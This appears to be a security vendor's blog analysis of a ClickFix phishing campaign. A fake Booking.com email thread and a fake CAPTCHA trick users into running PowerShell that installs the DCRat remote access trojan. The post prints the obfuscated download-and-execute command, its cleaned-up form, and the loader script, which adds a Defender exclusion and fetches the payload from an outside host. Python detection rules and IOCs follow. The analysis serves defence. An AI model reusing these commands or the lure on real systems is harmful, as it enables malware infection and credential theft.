Tricking users with ClickFix to deliver DCRat via fake email thread

We recently saw an attack that used a nifty little JavaScript trick to try to deliver a DCRat malware payload with some help from the user. The attack started with a fake email thread about a potential upcoming apartment rental. The attacker indicates that a colleague of theirs started to book a rental apartment, but then got ill, so they handed the job off (to the attacker).

The attacker indicates that while looking for an accommodation policy, Booking[.]com mentioned an accommodation surcharge. They wanted to confirm that this surcharge information was indeed accurate, so their message includes a link to Booking[.]com’s “Accommodation Rules” page for the target to review. This is a malicious link.

Fake email thread

The malicious link (which has since been flagged by Cloudflare) takes the target to a Cloudflare Turnstile CAPTCHA.

Cloudflare Turnstile CAPTCHA

After the real CAPTCHA comes a fake CAPTCHA. The favicon and tab title reflect Booking[.]com, but the CAPTCHA is a JavaScript-powered payload delivery system. When a user clicks the checkbox to confirm their non-robot status…

Fake CAPTCHA

…the following code snippet is automatically copied to their clipboard:


powERsheLl /nOPR"o" ―W h -c "$url = 'getsyv[.]com';$s"cr"i"pt" = I"nv"oke-"RestM"et"hod" -"Ur"i $url;I"n"vok"e-"Ex"p"re"ss"ion $scr"ip"t"

The command uses only light obfuscation: mixed case, double quotes that split tokens into fragments (the command-line parser drops the quotes and concatenates the pieces), a Unicode horizontal bar (U+2015) in place of the leading dash, which PowerShell treats as a dash, and host switches abbreviated to unambiguous prefixes (/nopro, -w h, -c). With the formatting cleaned up, it looks like:


powershell /noprofile -windowstyle hidden -command "
$url = 'getsyv[.]com';
$script = Invoke-RestMethod -Uri $url;
Invoke-Expression $script
"

At this point, the CAPTCHA window changes to include two “Verification Steps” for the target:

  1. Press Windows+R
  2. Press CTRL+V and press ENTER

Updated fake CAPTCHA with new instructions

If the target follows those steps, they’ll paste the command into a Run window.

The malicious command pasted into a Run window

If they click OK, a hidden, unelevated PowerShell starts and fetches the loader from getsyv[.]com. The UAC prompt the target then sees is raised by that loader, which relaunches PowerShell with -Verb RunAs to add a Windows Defender exclusion (see the loader script below).

UAC window for running the malicious PowerShell script

If the target approves the prompt, the elevated PowerShell runs in the background and the loader proceeds to download and execute the payload.

Loader script

Once run, the script reaches out to a server with the following HTTP request:


GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4046
Host: getsyv[.]com
Connection: Keep-Alive

The response from the server is:


HTTP/1.1 200 OK
date: Mon, 19 May 2025 19:01:07 GMT
server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
vary: User-Agent
last-modified: Thu, 15 May 2025 18:14:23 GMT
etag: "2de-63530a2a52e3f"
accept-ranges: bytes
content-length: 734

function VoidHelp {
    while ($true) {
        # Relaunch PowerShell elevated (-Verb RunAs raises the UAC prompt) to exclude
        # C:\Windows\Temp, where the payload will be dropped, from Windows Defender scanning.
        $command = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"

        $proc = Start-Process powershell.exe `
            -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `$ErrorActionPreference='Stop'; $command" `
            -Verb RunAs `
            -PassThru

        $proc.WaitForExit()

        # Exit code 0 means the user accepted the prompt and the exclusion was added;
        # otherwise (prompt declined or cancelled) loop and prompt again.
        if ($proc.ExitCode -eq 0) {
            Start-Sleep -Seconds 5
            RecHelp
            break
        }
    }
}

function RecHelp {
    # Custom request header sent with the download; the server's use of it is not shown on this page.
    $iks = @{
        "ny8DsFfwg1" = "FLiAHJErkN"
    }
    $url = "http://gettsveriff[.]com/bgj3/ckjg.exe"
    $destination = "C:\Windows\Temp\tybd7.exe"
    Invoke-WebRequest -Uri $url -Headers $iks -OutFile $destination
    Start-Process -FilePath $destination
}

VoidHelp

The loader is short but does three things: it re-raises the UAC prompt in a loop until the user accepts, adds C:\Windows\Temp as a Windows Defender exclusion, then downloads ckjg.exe from gettsveriff[.]com (sending a custom request header) to C:\Windows\Temp\tybd7.exe and runs it.
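To show how this chain looks from endpoint telemetry rather than from the email, here is an added Python example (not from this page or from Sublime) that runs three process-creation rules over constructed Sysmon-style events modelling the intrusion: a hidden PowerShell with a download cradle launched from the Run dialog (parent explorer.exe), an elevated PowerShell adding a Defender path exclusion, and PowerShell executing a binary out of C:\Windows\Temp. The event records, PIDs and paths are constructed for the example, not captured telemetry.

```python
"""Process-creation rules for the ClickFix -> Defender exclusion -> Temp drop chain (added example)."""
import re

PS_IMAGES = ("powershell.exe", "pwsh.exe")
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events (Sysmon Event ID 1-style fields) modelling the chain above.
EVENTS = [
    {"pid": 4120, "image": PS_PATH, "parent_image": r"C:\Windows\explorer.exe", "integrity": "Medium",
     "cmdline": 'powERsheLl /nOPR"o" \u2015W h -c "$url = \'getsyv[.]com\';$s"cr"i"pt" = '
                'I"nv"oke-"RestM"et"hod" -"Ur"i $url;I"n"vok"e-"Ex"p"re"ss"ion $scr"ip"t"'},
    {"pid": 4388, "image": PS_PATH, "parent_image": PS_PATH, "integrity": "High",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "
                "$ErrorActionPreference='Stop'; Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp'"},
    {"pid": 4512, "image": r"C:\Windows\Temp\tybd7.exe", "parent_image": PS_PATH, "integrity": "Medium",
     "cmdline": r"C:\Windows\Temp\tybd7.exe"},
    # Benign noise: an admin running a cmdlet from a console, and a user opening Notepad from the shell.
    {"pid": 5001, "image": PS_PATH, "parent_image": r"C:\Windows\System32\cmd.exe", "integrity": "Medium",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"pid": 5002, "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "integrity": "Medium", "cmdline": "notepad.exe"},
]

# Download-and-evaluate primitives, and the hidden-window switch in any prefix form ("-w h", "-win hid", ...).
CRADLE = re.compile(r"invoke-restmethod|invoke-webrequest|\birm\b|\biwr\b|downloadstring|invoke-expression|\biex\b")
HIDDEN = re.compile(r"(?:^|\s)[-/]w[a-z]*\s+h[a-z]*")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def normalize(cmdline: str) -> str:
    """Collapse the quote-splitting and dash-variant tricks so the regexes see the real tokens."""
    dashes = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2015": "-"})
    return cmdline.translate(dashes).replace('"', "").lower()


def rule_run_dialog_cradle(ev: dict) -> bool:
    """ClickFix via Win+R: explorer.exe spawns a hidden PowerShell that downloads and evaluates code."""
    if basename(ev["image"]) not in PS_IMAGES or basename(ev["parent_image"]) != "explorer.exe":
        return False
    cmd = normalize(ev["cmdline"])
    return bool(HIDDEN.search(cmd) and CRADLE.search(cmd))


def rule_defender_exclusion(ev: dict) -> bool:
    """PowerShell adding a Defender path exclusion (the loader's first action after UAC)."""
    cmd = normalize(ev["cmdline"])
    return basename(ev["image"]) in PS_IMAGES and "add-mppreference" in cmd and "-exclusionpath" in cmd


def rule_exec_from_temp(ev: dict) -> bool:
    """PowerShell launching a binary out of C:\\Windows\\Temp, where the payload was dropped."""
    return (basename(ev["parent_image"]) in PS_IMAGES
            and ev["image"].lower().startswith("c:\\windows\\temp\\"))


RULES = [rule_run_dialog_cradle, rule_defender_exclusion, rule_exec_from_temp]


def evaluate(events: list) -> list:
    """Return (rule name, pid) for every event that trips a rule; an event may trip several."""
    alerts = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                alerts.append((rule.__name__, ev["pid"]))
    return alerts


if __name__ == "__main__":
    for name, pid in evaluate(EVENTS):
        print(f"{name}: pid {pid}")
```

Each rule fires on exactly one of the three malicious events and on neither benign one. In a real deployment the second rule is the one to watch for false positives (administrators do add exclusions), so correlate it with the first rule by parent PID, which is what ties the exclusion back to the Run-dialog launch.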

DCRat malware

The downloaded file (ckjg.exe - 08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198) is DCRat (DarkCrystal), a commonly observed .NET-based remote access trojan (RAT) that has been in circulation since 2019. DCRat supports the functions typical of RATs, such as executing shell commands, keylogging, and exfiltrating files, browser cookies, saved passwords, and clipboard contents.

It has been widely used by both cybercrime and nation-state actors. As DCRat has been documented many times, we will skip the in-depth analysis. From the configuration embedded in the executable, the following indicators of compromise (IOCs) were observed.

IOCs

DCRat malware (sha256 of ckjg.exe)

  • 08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198

Filename of DCRat when saved to disk

  • C:\Windows\Temp\tybd7.exe

DCRat C2 servers

  • hkfasfsafg[.]click
  • hfjwfheiwf[.]click
  • jfhaowhfjk[.]click
  • hfjaohf9q3[.]click
  • fshjaifhajfa[.]click

Server within ClickFix PowerShell command

  • getsyv[.]com

Server hosting DCRat payload

  • gettsveriff[.]com

Emerging Threats Network IDS Signature

Detection signals

Sublime's AI-powered detection engine prevented this attack. Some of the top signals for this attack were:

  • New link domain (<=10d) from untrusted sender: The link within the message contained a newly registered domain name (extrannet-ruless[.]com).
  • Social engineering: The email creates a scenario involving a sick colleague to appeal to recipient's helpfulness and urgency.
  • Brand impersonation: The message references Booking[.]com but links to an unrelated domain (extrannet-ruless[.]com).
  • Fake thread: The email thread has been fabricated to include a legitimate-looking message sent from the target company.
  • Lookalike domain: The message contains a link to extrannet-ruless[.]com, which is similar to an admin portal on Booking[.]com named the Extranet.

ASA, Sublime’s Autonomous Security Analyst, flagged this email as malicious. Here is ASA’s analysis summary:

Stay secure against email-based ClickFix attacks

Attackers are always testing new ways to deliver payloads. That’s why the most effective email security platforms are adaptive, using AI and machine learning to shine a spotlight on seemingly minor discrepancies.

If you enjoyed this Attack Spotlight, be sure to check our blog every week for new blogs, subscribe to our RSS feed, or sign up for our monthly newsletter. Our newsletter covers the latest blogs, detections, product updates, and more.

About the Authors


Josh "Soup" Campbell

Detection

Soup is an Email Security Analyst at Sublime. With his background in InfoSec and proud membership of the SecKC community, security is both his profession and his passion. Soup was drawn to security by his need to protect people from threats and scams.


Brandon Murphy

Detection

Brandon is a Threat Detection Engineer at Sublime. He is a seasoned cybersecurity professional with over a decade of experience protecting internet users. Prior to Sublime, Brandon put his detection engineering expertise to use as a Sr. Staff Threat Analyst at Proofpoint.
